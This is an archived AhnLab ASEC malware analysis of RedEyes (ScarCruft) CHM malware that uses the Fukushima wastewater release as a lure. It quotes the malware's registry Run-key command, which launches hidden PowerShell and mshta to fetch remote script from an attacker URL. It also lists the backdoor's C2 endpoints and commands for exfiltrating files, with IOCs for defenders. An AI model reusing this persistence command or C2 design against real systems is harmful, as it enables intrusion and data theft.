RedEyes (ScarCruft)’s CHM Malware Using the Topic of
Fukushima Wastewater Release - ASEC
By ATCP
Published: 2023-09-03 · Archived: 2026-04-05 19:10:03 UTC
The AhnLab Security Emergency response Center (ASEC) analysis team has recently discovered that the CHM
malware, which is assumed to have been created by the RedEyes threat group, is being distributed again. The
CHM malware in distribution operates in a similar way to the “CHM Malware Disguised as Security Email
from a Korean Financial Company”[1] covered in March of this year and also uses the same commands used in
the “2.3. Persistence”[2] stage in the attack process of the RedEyes group’s M2RAT malware’.
The recent attack used information regarding the release of Fukushima wastewater. By using such a spotlight issue
in Korea, the threat actor provokes the user’s curiosity and leads them to open the malicious file. Information
about this issue can be seen in the help file window generated when the CHM malware is executed, as shown in
Figure 1.
https://asec.ahnlab.com/en/56857/
Page 1 of 5

Figure 2 shows the malicious script that operates during this process. The mshta command used to be executed
directly by the CHM file (hh.exe), but the recently distributed file registers the command to the RUN key enabling
it to be run when the system reboots.
RUN key registration
Registry path: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value name: fGZtm
Value: c:\windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -
ep bypass ping -n 1 -w 391763 2.2.2.2 || mshta hxxp://navercorp[.]ru/dashboard/image/202302/4.html
When the command registered to the RUN key is executed, an additional script at a certain URL runs through
mshta. The said URL contains a JavaScript (JS) code. This code is responsible for executing an encoded
PowerShell command. This process is similar in structure to the commands used in the attack process of
previously covered CHM malware and M2RAT malware.
https://asec.ahnlab.com/en/56857/
Page 2 of 5

The decoded PowerShell command is a backdoor responsible for registering the RUN key to establish persistence,
receiving commands from the threat actor’s server, and transmitting the command execution results. It receives
commands from the threat actor’s server, and according to the commands, can perform various malicious
behaviors such as uploading/downloading files, transmitting information on specific files, and editing the registry.
C2
hxxp://navercorp[.]ru/dashboard/image/202302/com.php?U=[Computer name]-[User name] //
Receive the threat actor’s command
hxxp://navercorp[.]ru/dashboard/image/202302/com.php?R=[BASE64 encoding] // Transmit the
command execution results
https://asec.ahnlab.com/en/56857/
Page 3 of 5

Command Feature
fileinfo
Saves the list of files and their properties (name, size, last modified time) in a
certain path as CSV, transmits this file to the C2 server, then deletes it from the
local system
dir
Compresses folders in a certain path, transmits them to the C2 server, then
deletes them from the local system
file Sends (uploads) a certain file to the C2 server
down Downloads files in a certain path
regedit Edits the registry
task Adds a task to the Task Scheduler to be repetitively run at 10-minute intervals
zip Decompresses a compressed file in a certain path
rename Changes the name of a certain file
del Delete files in a certain path
Table 1. List of commands received
When a system is infected with this type of malware, the system can suffer great damage since this malware is
capable of performing various malicious acts such as downloading additional files and breaching data according to
the threat actor’s commands. In particular, malware that targets users in Korea may include information on topics
of interest to the user to encourage them to execute the malware, so users should refrain from opening emails from
unknown sources and should not execute their attachments. Users should also regularly scan their PCs and update
their security products to the latest engine.
[File Detection]
Downloader/CHM.Generic (2023.09.02.00)
MD5
52f71fadf0ea5ffacd753e83a3d0af1a
Additional IOCs are available on AhnLab TIP.
URL
http[:]//navercorp[.]ru/dashboard/image/202302/4[.]html
http[:]//navercorp[.]ru/dashboard/image/202302/com[.]php
Additional IOCs are available on AhnLab TIP.
https://asec.ahnlab.com/en/56857/
Page 4 of 5

Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click
the banner below.
Source: https://asec.ahnlab.com/en/56857/
https://asec.ahnlab.com/en/56857/
Page 5 of 5